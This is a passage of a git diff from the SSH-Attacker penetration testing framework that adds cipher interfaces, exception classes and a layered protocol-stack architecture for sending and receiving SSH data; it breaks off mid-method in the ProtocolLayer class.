Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.crypto.cipher; + +import de.rub.nds.sshattacker.core.exceptions.CryptoException; + +/** */ +public interface DecryptionCipher { + + public int getBlocksize(); + + public byte[] decrypt(byte[] someBytes) throws CryptoException; + + public byte[] decrypt(byte[] iv, byte[] someBytes) throws CryptoException; + + public byte[] decrypt(byte[] iv, int tagLength, byte[] someBytes) throws CryptoException; + + public byte[] decrypt( + byte[] iv, int tagLength, byte[] additionAuthenticatedData, byte[] someBytes) + throws CryptoException; + + public byte[] getIv(); + + public void setIv(byte[] iv); + + EncryptionCipher getEncryptionCipher(); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java new file mode 100644 index 000000000..3a2350d3f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java @@ -0,0 +1,32 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.crypto.cipher; + +import de.rub.nds.sshattacker.core.exceptions.CryptoException; + +/** */ +public interface EncryptionCipher { + + public int getBlocksize(); + + public byte[] encrypt(byte[] someBytes) throws CryptoException; + + public byte[] encrypt(byte[] iv, byte[] someBytes) throws CryptoException; + + public byte[] encrypt(byte[] iv, int tagLength, byte[] someBytes) throws CryptoException; + + public byte[] encrypt( + byte[] iv, int tagLength, byte[] additionAuthenticatedData, byte[] someBytes) + throws CryptoException; + + public byte[] getIv(); + + public void setIv(byte[] iv); + + DecryptionCipher getDecryptionCipher(); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java index e5721fdc5..927238d10 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/hash/ExchangeHash.java @@ -15,8 +15,8 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.MissingExchangeHashInputException; import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.serializer.KeyExchangeInitMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/AbstractEcdhKeyExchange.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/AbstractEcdhKeyExchange.java index b52c2f57b..2bb3d16eb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/AbstractEcdhKeyExchange.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/AbstractEcdhKeyExchange.java @@ -10,7 +10,7 @@ import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.constants.KeyExchangeFlowType; import de.rub.nds.sshattacker.core.constants.NamedEcGroup; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/DhKeyExchange.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/DhKeyExchange.java index 4300fcb1f..f04cdf428 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/DhKeyExchange.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/DhKeyExchange.java @@ -16,7 +16,7 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomKeyPair; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import java.math.BigInteger; import java.util.Arrays; import java.util.Comparator; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/HybridKeyExchange.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/HybridKeyExchange.java index 6f1e49ee2..8757bad6c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/HybridKeyExchange.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/HybridKeyExchange.java @@ -11,7 +11,7 @@ import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.constants.KeyExchangeFlowType; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import java.lang.reflect.InvocationTargetException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchange.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchange.java index 556f1c336..ec82b6242 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchange.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/RsaKeyExchange.java @@ -22,7 +22,7 @@ import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import java.math.BigInteger; import java.security.KeyPair; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java new file mode 100644 index 000000000..91fae4347 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.exceptions; + +public class EndOfStreamException extends RuntimeException { + + public EndOfStreamException() {} + + public EndOfStreamException(String message) { + super(message); + } + + public EndOfStreamException(String message, Throwable cause) { + super(message, cause); + } + + public EndOfStreamException(Throwable cause) { + super(cause); + } + + public EndOfStreamException( + String message, + Throwable cause, + boolean enableSuppression, + boolean writableStackTrace) { + super(message, cause, enableSuppression, writableStackTrace); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/TimeoutException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/TimeoutException.java new file mode 100644 index 000000000..0de2d143d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/TimeoutException.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.exceptions; + +public class TimeoutException extends RuntimeException { + + public TimeoutException() {} + + public TimeoutException(String message) { + super(message); + } + + public TimeoutException(String message, Throwable cause) { + super(message, cause); + } + + public TimeoutException(Throwable cause) { + super(cause); + } + + public TimeoutException( + String message, + Throwable cause, + boolean enableSuppression, + boolean writableStackTrace) { + super(message, cause, enableSuppression, writableStackTrace); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/GenericReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/GenericReceiveLayerConfiguration.java new file mode 100644 index 000000000..f1b87469a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/GenericReceiveLayerConfiguration.java @@ -0,0 +1,36 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import java.util.LinkedList; +import java.util.List; + +/** A LayerConfiguration that keeps receiving until reaching the timeout */ +public class GenericReceiveLayerConfiguration extends ReceiveLayerConfiguration { + + public GenericReceiveLayerConfiguration(LayerType layerType) { + super(layerType, new LinkedList<>()); + } + + @Override + public boolean isProcessTrailingContainers() { + return true; + } + + @Override + public boolean executedAsPlanned(List list) { + return true; + } + + @Override + public boolean failedEarly(List list) { + return false; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java new file mode 100644 index 000000000..776201602 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java @@ -0,0 +1,65 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import java.util.Arrays; +import java.util.List; + +/** + * Contains a list of {@link DataContainer} with additional information about how to send and + * receive them and whether they were sent/received correctly. + * + * @param + */ +public abstract class LayerConfiguration { + + private final List containerList; + + private final LayerType layerType; + + public LayerConfiguration(LayerType layerType, List containerList) { + this.containerList = containerList; + this.layerType = layerType; + } + + public LayerConfiguration(LayerType layerType, Container... containers) { + this.containerList = Arrays.asList(containers); + this.layerType = layerType; + } + + public List getContainerList() { + return containerList; + } + + /** + * Determines if the LayerConfiguration, based on the final list of DataContainers, is satisfied + * + * @param list The list of DataContainers + * @return The final evaluation result + */ + public abstract boolean executedAsPlanned(List list); + + /** + * Determines if the LayerConfiguration, based on the current list of DataContainers, can + * possibly still be satisfied + * + * @param list The list of DataContainers + * @return The evaluation result based on the current DataContainers + */ + public abstract boolean failedEarly(List list); + + public boolean successRequiresMoreContainers(List list) { + return !failedEarly(list) && !executedAsPlanned(list); + } + + public LayerType getLayerType() { + return layerType; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java new file mode 100644 index 000000000..f533d56d5 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java @@ -0,0 +1,83 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import java.util.List; + +/** + * Contains information about a layers actions, both after sending and receiving data. + * + * @param + */ +public class LayerProcessingResult { + + /** List of containers that were sent or received */ + private List usedContainers; + + /** Type of layer that produced this result. */ + private LayerType layerType; + + /** Whether the layer could send or receive bytes as planned. */ + private boolean executedAsPlanned; + + // holds any bytes which are unread in the layer after parsing + private byte[] unreadBytes; + + public LayerProcessingResult( + List usedContainers, + LayerType layerType, + boolean executedAsPlanned, + byte[] unreadBytes) { + this.usedContainers = usedContainers; + this.layerType = layerType; + this.executedAsPlanned = executedAsPlanned; + this.unreadBytes = unreadBytes; + } + + public LayerProcessingResult( + List usedContainers, LayerType layerType, boolean executedAsPlanned) { + this.usedContainers = usedContainers; + this.layerType = layerType; + this.executedAsPlanned = executedAsPlanned; + this.unreadBytes = new byte[0]; + } + + public List getUsedContainers() { + return usedContainers; + } + + public void setUsedContainers(List usedContainers) { + this.usedContainers = usedContainers; + } + + public LayerType getLayerType() { + return layerType; + } + + public boolean isExecutedAsPlanned() { + return executedAsPlanned; + } + + public void setExecutedAsPlanned(boolean executedAsPlanned) { + this.executedAsPlanned = executedAsPlanned; + } + + public void setLayerType(LayerType layerType) { + this.layerType = layerType; + } + + public byte[] getUnreadBytes() { + return unreadBytes; + } + + public void setUnreadBytes(byte[] unreadBytes) { + this.unreadBytes = unreadBytes; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java new file mode 100644 index 000000000..d1fd0d1fe --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -0,0 +1,183 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import de.rub.nds.sshattacker.core.state.Context; +import java.io.IOException; +import java.util.Arrays; +import java.util.Collections; +import java.util.LinkedList; +import java.util.List; +import java.util.stream.Collectors; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * Aggregates multiple layers into a protocol stack. Offers functionality for sending and receiving + * messages through the message stack. Can be created manually or using {@link LayerStackFactory}. + */ +public class LayerStack { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** + * The layer list, layer 0 is the highest layer, layer n is the lowest. Eg. For TLS layer 0 + * could be the application layer, layer 1 the tls message layer layer 2 the record layer and + * layer 3 the tcp transport layer, layer 4 could be the ip layer layer 5 could be the ethernet + * layer. Not all layers need to be defined at any time, it is perfectly fine to leave the layer + * stack and plug another component in which does the rest of the processing + */ + private final List layerList; + + private final Context context; + + public LayerStack(Context context, ProtocolLayer... layers) { + this.context = context; + layerList = Arrays.asList(layers); + for (int i = 0; i < layers.length; i++) { + ProtocolLayer layer = layerList.get(i); + if (i != 0) { + layer.setHigherLayer(layerList.get(i - 1)); + } + if (i != layers.length - 1) { + layer.setLowerLayer(layerList.get(i + 1)); + } + } + } + + public final ProtocolLayer getLayer(Class layerClass) { + for (ProtocolLayer layer : getLayerList()) { + if (layer.getClass().equals(layerClass)) { + return layer; + } + } + return null; + } + + public ProtocolLayer getHighestLayer() { + return getLayerList().get(0); + } + + public ProtocolLayer getLowestLayer() { + return getLayerList().get(getLayerList().size() - 1); + } + + /** + * Sends data over the protocol stack based on the layer configurations provided in + * layerConfigurationList. + * + * @param layerConfigurationList Contains {@link DataContainer} to be sent through the protocol + * stack. + * @return LayerStackProcessingResult Contains information about the "send" execution. Does not + * contain any messages the peer sends back. + * @throws IOException If any layer fails to send its data. + */ + public LayerStackProcessingResult sendData(List layerConfigurationList) + throws IOException { + LOGGER.debug("Sending Data"); + if (getLayerList().size() != layerConfigurationList.size()) { + throw new RuntimeException( + "Illegal LayerConfiguration list provided. Each layer needs a configuration entry (null is fine too if no explicit configuration is desired). Expected " + + getLayerList().size() + + " but found " + + layerConfigurationList.size()); + } + + // Prepare layer configuration and clear previous executions + for (int i = 0; i < getLayerList().size(); i++) { + ProtocolLayer layer = getLayerList().get(i); + layer.clear(); + layer.setLayerConfiguration(layerConfigurationList.get(i)); + } + context.setTalkingConnectionEndType(context.getConnection().getLocalConnectionEndType()); + // Send data + for (ProtocolLayer layer : getLayerList()) { + layer.sendConfiguration(); + } + + // Gather results + List resultList = new LinkedList<>(); + getLayerList() + .forEach( + layer -> { + resultList.add(layer.getLayerResult()); + }); + return new LayerStackProcessingResult(resultList); + } + + /** + * Receives messages pre-defined in the layerConfigurationList through the message stack. + * Timeouts if not all specified messages are received. + * + * @param layerConfigurationList Contains specific {@link DataContainer} to be received from the + * peer. + * @return LayerStackProcessingResult Contains information about the "send" execution. Does not + * contain any messages the peer sends back. If any layer fails to receive the specified + * data. + */ + public LayerStackProcessingResult receiveData(List layerConfigurationList) { + LOGGER.debug("Receiving Data"); + if (getLayerList().size() != layerConfigurationList.size()) { + throw new RuntimeException( + "Illegal LayerConfiguration list provided. Each layer needs a configuration entry (null is fine too if no explicit configuration is desired). Expected " + + getLayerList().size() + + " but found " + + layerConfigurationList.size()); + } + // Prepare layer configuration and clear previous executions + for (int i = 0; i < getLayerList().size(); i++) { + ProtocolLayer layer = getLayerList().get(i); + layer.clear(); + layer.setLayerConfiguration(layerConfigurationList.get(i)); + } + context.setTalkingConnectionEndType( + context.getConnection().getLocalConnectionEndType().getPeer()); + getLayerList().get(0).receiveData(); + // reverse order + for (int i = getLayerList().size() - 1; i >= 0; i--) { + ProtocolLayer layer = getLayerList().get(i); + if (layer.getLayerConfiguration() != null && !layer.executedAsPlanned()) { + try { + layer.receiveData(); + } catch (UnsupportedOperationException e) { + // most layers dont know how to receive data themselves + LOGGER.debug( + "Skipping layer " + + layer.getLayerType() + + ". Does not support direct data read."); + } + } + } + return gatherResults(); + } + + /** + * Manually gathers information about each layer's execution. E.g., whether the layer executed + * successfully and the peer's answers. + * + * @return LayerStackProcessingResult Contains the execution results of each layer. + */ + public LayerStackProcessingResult gatherResults() { + // Gather results + List resultList = new LinkedList<>(); + getLayerList().forEach(tempLayer -> resultList.add(tempLayer.getLayerResult())); + return new LayerStackProcessingResult(resultList); + } + + /** Returns the layers of this LayerStack by type. */ + public List getLayersInStack() { + return layerList.stream().map(ProtocolLayer::getLayerType).collect(Collectors.toList()); + } + + /** Returns the layer list. */ + public List getLayerList() { + return Collections.unmodifiableList(layerList); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java new file mode 100644 index 000000000..b020bd9cd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java @@ -0,0 +1,75 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.context.TcpContext; +import de.rub.nds.sshattacker.core.layer.impl.*; +import de.rub.nds.sshattacker.core.state.Context; + +/** + * Creates a layerStack based on pre-defined configurations. E.g., to send TLS messages with + * TLS-Attacker, we have to produce a layerStack that contains the MessageLayer, RecordLayer, and + * TcpLayer. Each layer is assigned a different context. + */ +public class LayerStackFactory { + + public static LayerStack createLayerStack(LayerConfiguration type, Context context) { + + LayerStack layerStack; + SshContext sshContext = context.getSshContext(); + TcpContext tcpContext = context.getTcpContext(); + // HttpContext httpContext = context.getHttpContext(); + + switch (type) { + /*case OPEN_VPN: + case QUIC: + case STARTTLS: + throw new UnsupportedOperationException("Not implemented yet"); + case DTLS: + return new LayerStack( + context, + new MessageLayer(tlsContext), + new DtlsFragmentLayer(tlsContext), + new RecordLayer(tlsContext), + new UdpLayer(tlsContext)); + case TLS: + layerStack = + new LayerStack( + context, + new MessageLayer(tlsContext), + new RecordLayer(tlsContext), + new TcpLayer(tcpContext)); + context.setLayerStack(layerStack); + return layerStack; + case HTTPS: + layerStack = + new LayerStack( + context, + new HttpLayer(httpContext), + new MessageLayer(tlsContext), + new RecordLayer(tlsContext), + new TcpLayer(tcpContext)); + return layerStack; + case SSL2: + layerStack = + new LayerStack( + context, new SSL2Layer(tlsContext), new TcpLayer(tcpContext)); + return layerStack;*/ + case SSHv1: + layerStack = + new LayerStack( + context, new SSH1Layer(sshContext), new TcpLayer(tcpContext)); + return layerStack; + + default: + throw new RuntimeException("Unknown LayerStackType: " + type.name()); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackProcessingResult.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackProcessingResult.java new file mode 100644 index 000000000..73c4f6de1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackProcessingResult.java @@ -0,0 +1,59 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import java.util.LinkedList; +import java.util.List; + +/** + * Wrapper class for {@link LayerProcessingResult}. Makes results of multiple layers available for a + * {@link LayerStack}. + */ +public class LayerStackProcessingResult { + + private final List layerProcessingResultList; + + // whether any layer has unreadBytes + private boolean hasUnreadBytes; + + private final List layersWithUnreadBytes = new LinkedList<>(); + + public LayerStackProcessingResult(List layerProcessingResultList) { + this.layerProcessingResultList = layerProcessingResultList; + for (LayerProcessingResult layerProcessingResult : layerProcessingResultList) { + if (layerProcessingResult.getUnreadBytes().length != 0) { + layersWithUnreadBytes.add(layerProcessingResult.getLayerType()); + hasUnreadBytes = true; + } + } + } + + public List getLayerProcessingResultList() { + return layerProcessingResultList; + } + + public LayerProcessingResult getResultForLayer(LayerType layerType) { + if (layerProcessingResultList != null) { + for (LayerProcessingResult layerResult : layerProcessingResultList) { + if (layerResult.getLayerType().equals(layerType)) { + return layerResult; + } + } + } + return null; + } + + public boolean hasUnreadBytes() { + return hasUnreadBytes; + } + + public List getLayersWithUnreadBytes() { + return layersWithUnreadBytes; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java new file mode 100644 index 000000000..7f60eedec --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java @@ -0,0 +1,31 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.layer.context.LayerContext; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import jakarta.xml.bind.annotation.XmlAccessType; +import jakarta.xml.bind.annotation.XmlAccessorType; +import jakarta.xml.bind.annotation.XmlSeeAlso; + +/** + * Abstract class for different messages the TLS-Attacker can send. This includes but is not limited + * to TLS-Messages. + * + * @param The message class itself + * @param The type of context this message needs to use, relates to the messages' layer. + */ +@XmlAccessorType(XmlAccessType.FIELD) +@XmlSeeAlso({Message.class, ProtocolMessage.class}) +public abstract class Message, Context extends LayerContext> + extends ModifiableVariableHolder implements DataContainer { + + public abstract String toShortString(); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java new file mode 100644 index 000000000..e25e16aff --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -0,0 +1,280 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer; + +import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; +import de.rub.nds.sshattacker.core.exceptions.PreparationException; +import de.rub.nds.sshattacker.core.layer.constant.LayerType; +import de.rub.nds.sshattacker.core.layer.context.LayerContext; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import de.rub.nds.sshattacker.core.layer.data.Handler; +import de.rub.nds.sshattacker.core.layer.data.Parser; +import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import java.io.IOException; +import java.util.LinkedList; +import java.util.List; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * Abstracts a message layer (TCP, UDP, IMAP, etc.). Each layer knows of the layer below and above + * itself. It can send messages using the layer below and forward received messages to the layer + * above. + * + * @param Some layers need a hint which message they should send or receive. + * @param The kind of messages/Containers this layer is able to send and receive. + */ +public abstract class ProtocolLayer< + Hint extends LayerProcessingHint, Container extends DataContainer> { + + private static final Logger LOGGER = LogManager.getLogger(); + + private ProtocolLayer higherLayer = null; + + private ProtocolLayer lowerLayer = null; + + private LayerConfiguration layerConfiguration; + + private List producedDataContainers; + + protected HintedInputStream currentInputStream = null; + + protected HintedInputStream nextInputStream = null; + + private LayerType layerType; + + private byte[] unreadBytes; + + public ProtocolLayer(LayerType layerType) { + producedDataContainers = new LinkedList<>(); + this.layerType = layerType; + this.unreadBytes = new byte[0]; + } + + public ProtocolLayer getHigherLayer() { + return higherLayer; + } + + public ProtocolLayer getLowerLayer() { + return lowerLayer; + } + + public void setHigherLayer(ProtocolLayer higherLayer) { + this.higherLayer = higherLayer; + } + + public void setLowerLayer(ProtocolLayer lowerLayer) { + this.lowerLayer = lowerLayer; + } + + public abstract LayerProcessingResult sendConfiguration() throws IOException; + + public abstract LayerProcessingResult sendData(Hint hint, byte[] additionalData) + throws IOException; + + public LayerConfiguration getLayerConfiguration() { + return layerConfiguration; + } + + public void setLayerConfiguration(LayerConfiguration layerConfiguration) { + this.layerConfiguration = layerConfiguration; + } + + public LayerProcessingResult getLayerResult() { + boolean isExecutedAsPlanned = executedAsPlanned(); + return new LayerProcessingResult( + producedDataContainers, getLayerType(), isExecutedAsPlanned, getUnreadBytes()); + } + + public boolean executedAsPlanned() { + boolean isExecutedAsPlanned = true; + if (getLayerConfiguration() != null) { + isExecutedAsPlanned = getLayerConfiguration().executedAsPlanned(producedDataContainers); + } + return isExecutedAsPlanned; + } + + /** Sets input stream to null if empty. Throws an exception otherwise. */ + public void removeDrainedInputStream() { + try { + if (currentInputStream != null && currentInputStream.available() > 0) { + throw new RuntimeException("Trying to drain a non-empty inputStream"); + } else { + currentInputStream = null; + } + } catch (IOException ex) { + LOGGER.error("Could not evaluate Stream availability. Removing Stream anyways"); + currentInputStream = null; + } + } + + public void clear() { + producedDataContainers = new LinkedList<>(); + layerConfiguration = null; + currentInputStream = null; + nextInputStream = null; + } + + protected void addProducedContainer(Container container) { + producedDataContainers.add(container); + } + + protected boolean containerAlreadyUsedByHigherLayer(Container container) { + if (producedDataContainers == null) { + return false; + } + // must check for identical references here + return producedDataContainers.stream() + .anyMatch(listedContainer -> listedContainer == container); + } + + /** + * A receive call which tries to read till either a timeout occurs or the configuration is + * fullfilled + * + * @return LayerProcessingResult Contains information about the execution of the receive action. + */ + public abstract LayerProcessingResult receiveData(); + + /** + * Tries to fill up the current Stream with more data, if instead unprocessable data (for the + * calling layer) is produced, the data is instead cached in the next inputstream. It may be + * that the current input stream is null when this method is called. + * + * @param hint This hint from the calling layer specifies which data its wants to read. + * @throws IOException Some layers might produce IOExceptions when sending or receiving data + * over sockets etc. + */ + public abstract void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException; + + /** + * Returns a datastream from which currently should be read + * + * @return The next data stream with data available. + * @throws IOException Some layers might produce IOExceptions when sending or receiving data + * over sockets etc. + */ + public HintedInputStream getDataStream() throws IOException { + if (currentInputStream == null) { + receiveMoreDataForHint(null); + if (currentInputStream == null) { + throw new EndOfStreamException( + "Could not receive data stream from lower layer, nothing more to receive"); + } + } + if (currentInputStream.available() > 0) { + return currentInputStream; + } else { + if (nextInputStream != null) { + currentInputStream = nextInputStream; + return currentInputStream; + } else { + LOGGER.debug("Trying to get datastream while no data is available"); + this.receiveMoreDataForHint(null); + return currentInputStream; + } + } + } + + /** + * Evaluates if more data can be retrieved for parsing immediately, i.e without receiving on the + * lowest layer. + * + * @return true if more data is available in any receive buffer + */ + public boolean isDataBuffered() { + try { + if ((currentInputStream != null && currentInputStream.available() > 0) + || nextInputStream != null && nextInputStream.available() > 0) { + return true; + } else if (getLowerLayer() != null) { + return getLowerLayer().isDataBuffered(); + } + return false; + } catch 